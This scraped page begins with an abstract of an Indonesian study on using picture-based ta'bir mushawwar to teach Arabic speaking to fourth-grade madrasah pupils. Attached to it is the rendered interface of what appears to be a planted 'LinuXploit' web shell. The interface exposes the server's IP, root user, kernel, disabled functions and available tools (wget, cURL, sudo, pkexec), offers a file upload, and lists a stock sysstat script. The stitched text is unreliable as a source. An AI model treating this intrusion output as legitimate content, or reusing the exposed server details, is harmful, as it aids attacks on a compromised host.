Efektivitas Strategi Ta’bir Mushawwar dalam Pembelajaran Bahasa Arab di Madrasah Ibtidaiyah
Abstract
Speaking proficiency is one of the main skills in Arabic language learning, but fourth grade students of MI TPI Keramat face difficulties in assembling mufradat and practicing active conversation, mainly due to the lack of varied learning strategies. This study aims to analyze the effectiveness of the ta'bir mushawwar strategy, which uses picture as a media to facilitate students in constructing sentences and telling stories, in improving Arabic speaking skills. With a quantitative approach and pre-experiment design, this study involved 18 students of class IV-C. Data were collected through tests, observations, and interviews, then analyzed descriptively and N-Gain test. The posttest average was 83.06 (very good category) with 88.9% completeness, and the N-Gain score was 0.6398 which showed effectiveness in the medium category. The ta'bir mushawwar strategy offers a solution in the form of a visual and hands-on learning approach that can significantly improve students' speaking skills and make learning more interesting and interactive.
Server IP : 103.175.217.176 / Your IP : 18.116.85.204 Web Server : Apache/2.4.62 (Debian) System : Linux bilfathvps 5.10.0-33-amd64 #1 SMP Debian 5.10.226-1 (2024-10-03) x86_64 User : root ( 0) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /lib/sysstat/ |
Upload File : |
#!/bin/sh # /usr/lib/sysstat/sa2 # (C) 1999-2020 Sebastien Godard (sysstat <at> orange.fr) # #@(#) sysstat-12.5.2 #@(#) sa2: Write a daily report # S_TIME_FORMAT=ISO ; export S_TIME_FORMAT prefix=/usr exec_prefix=${prefix} SA_DIR=/var/log/sysstat SYSCONFIG_DIR=/etc/sysstat SYSCONFIG_FILE=sysstat HISTORY=7 COMPRESSAFTER=10 ZIP="xz" UMASK=0022 ENDIR= DELAY_RANGE=0 # Read configuration file, overriding variables set above [ -r ${SYSCONFIG_DIR}/${SYSCONFIG_FILE} ] && . ${SYSCONFIG_DIR}/${SYSCONFIG_FILE} umask ${UMASK} # Wait for a random delay if requested if [ ${DELAY_RANGE} -gt 0 ] then RANDOM=$$ DELAY=$((${RANDOM}%${DELAY_RANGE})) sleep ${DELAY} fi [ -d ${SA_DIR} ] || SA_DIR=/var/log/sysstat # if YESTERDAY=no then today's summary is generated if [ x$YESTERDAY = xno ] then DATE_OPTS= else DATE_OPTS="--date=yesterday" fi if [ ${HISTORY} -gt 28 ] then DATE=`date ${DATE_OPTS} +%Y%m%d` else DATE=`date ${DATE_OPTS} +%d` fi CURRENTFILE=sa${DATE} CURRENTRPT=sar${DATE} RPT=${SA_DIR}/${CURRENTRPT} DFILE=${SA_DIR}/${CURRENTFILE} if [ -z "${ENDIR}" ]; then ENDIR=${exec_prefix}/bin fi [ -f "${DFILE}" ] || exit 0 cd ${ENDIR} if [ x${REPORTS} != xfalse ] then ${ENDIR}/sar.sysstat "$@" -f ${DFILE} > ${RPT} fi SAFILES_REGEX='/sar?[0-9]{2,8}(\.(Z|gz|bz2|xz|lz|lzo))?$' find "${SA_DIR}" -type f -mtime +${HISTORY} \ | egrep "${SAFILES_REGEX}" \ | xargs rm -f UNCOMPRESSED_SAFILES_REGEX='/sar?[0-9]{2,8}$' find "${SA_DIR}" -type f -mtime +${COMPRESSAFTER} \ | egrep "${UNCOMPRESSED_SAFILES_REGEX}" \ | xargs -r "${ZIP}" > /dev/null exit 0
Youez - 2016 - github.com/yon3zu
LinuXploit